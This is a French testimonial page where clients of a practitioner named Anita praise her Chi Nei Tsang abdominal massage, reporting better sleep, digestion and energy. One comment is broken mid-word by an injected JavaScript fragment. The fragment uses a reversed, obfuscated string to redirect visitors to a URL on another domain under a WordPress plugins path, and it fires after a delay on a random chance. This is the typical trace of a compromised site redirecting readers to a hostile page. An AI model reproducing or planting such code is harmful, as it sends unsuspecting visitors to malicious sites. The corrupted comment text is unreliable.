Chi Nei Tsang témoignages
Vos témoignages et vos retours après nos séances de Chi Nei Tsang m’encouragent à continuer dans ma pratique et à me perfectionner davantage. Merci infiniment !
Si vous avez l’élan de me partager votre expérience suite à l’une de nos séances et que vous ne l’avez pas encore fait, ce sera un grand plaisir de vous lire en commentaire de cette page, en messages privés ou bien sur ma fiche établissement de Google Map.
Vos témoignages sur le Chi Nei Tsang
N’hésitez pas à me faire vos retours, des points que vous avez appréciés, des points que je peux améliorer, et même des points d’interrogation ou ceux restés en suspens 🙂
Je progresse chaque jour pour encore mieux accompagner ceux et celles qui le souhaitent, et c’est grâce à vous.
Merci pour vos retours de ce massage du ventre chinois, en voici quelques uns que vous m’avez envoyé par Messages privés :
Bonjour Anita,
Je te fais un retour suite au massage d’hier.
Je me sens vraiment très bien, j’ai fait une bonne nuit de sommeil après des semaines sans dormir correctement, mon transit a l’air de revenir à la normale aussi.
Je me sens un peu fatiguée mais sinon plus présente dans mon corps et moins figée au niveau du système digestif ! Et j’avais le ventre bien plus plat.
J’ai un peu de douleur au niveau des points d’appui du diaphragme mais rien de très important !
Je te remercie encore ! Je suis impressionnée de déjà voir une différence.
Jolie journée à toi
C’est comme si j’avais reçu un massage de tout le corps, alors que tu m’as massé le ventre uniquement ! Je me sens légère, détendue, alors que j’étais très tendue en ce moment aves l’organisation de mon mariage. C’est comme si je flottais, incroyable !!!
Bonjour Anita. Merci pour pour ton sincère massage. Je me sens drainée jusqu’aux jambes. Adapté à la personne et non protocolé comme en institut. Merci.
Et bien sûr je me sens bien au niveau du ventre. Moins ballonné.

Vos avis sur ce site :
Vous pouvez aussi laisser votre témoignage directement en commentaire en bas de cette page dédiée :
5 Commentaires
Soumettre un commentaire
Merci pour vos retours sur mes massages et soins
J’ai fait un massage Chi Nei Tsang, et j’ai eu par la suite un regain d’énergie, plus de joie, de bonheur, j’étais moins fatigué. L’énergie circule ! Merci, je recommande 🙂
J’ai bénéficié de plusieurs séances de massage Chi Nei Tsang avec Anita. Ce sont de vrais moments de partage et de détente. Suite à ceux-ci, je me suis sentie plus légère sur le plan digestif, plus ancrée et surtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout pleine d’énergie.
Je recommande vivement !
J’ai reçu un massage et je me suis senti libéré du ventre. Un regain d’énergie et une belle expérience.
J’ai découvert le massage Chi Nei Tsang avec Anita, très à l’écoute et dans le partage. J’ai ressenti un vrai relâchement le jour même et le lendemain, une sensation de bonheur et de paix. Merci, je recommande
Anita est une personne très attentionnée, qui sait mettre en confiance. C’était mon premier massage, elle a su répondre à mes questions et me rassurer. N’hésitez pas à prendre rendez-vous avec elle que ce soit votre premier massage ou non 😉
Le massage en lui-même a été une nouvelle expérience : des moments agréables, d’autres moins et je me suis un peu endormie sur la fin. La sensation post-massage est très agréable, je recommande !